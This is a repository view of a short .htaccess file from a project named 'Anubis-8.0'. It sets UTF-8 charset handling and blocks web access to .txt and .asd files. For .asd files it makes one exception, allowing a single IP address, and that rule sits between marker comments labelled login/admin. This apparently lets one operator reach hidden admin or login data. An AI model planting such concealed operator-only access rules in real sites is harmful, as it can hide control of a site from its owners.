Files
Anubis-8.0/dd.htaccess
T

26 lines
355 B
Plaintext
Raw Normal View History

2026-08-27 10:50:54 -06:00
AddDefaultCharset utf-8
AddCharset utf-8 *
<IfModule mod_charset.c>
CharsetSourceEnc utf-8
CharsetDefault utf-8
</IfModule>
<FilesMatch ".(asd)$">
Order Deny,Allow
Deny from all
#!!!access html!!!
#!!!login!!!adm
Allow from 185.220.101.13
#***endloginadmin
</FilesMatch>
<FilesMatch ".(txt)$">
Order Deny,Allow
Deny from all
</FilesMatch>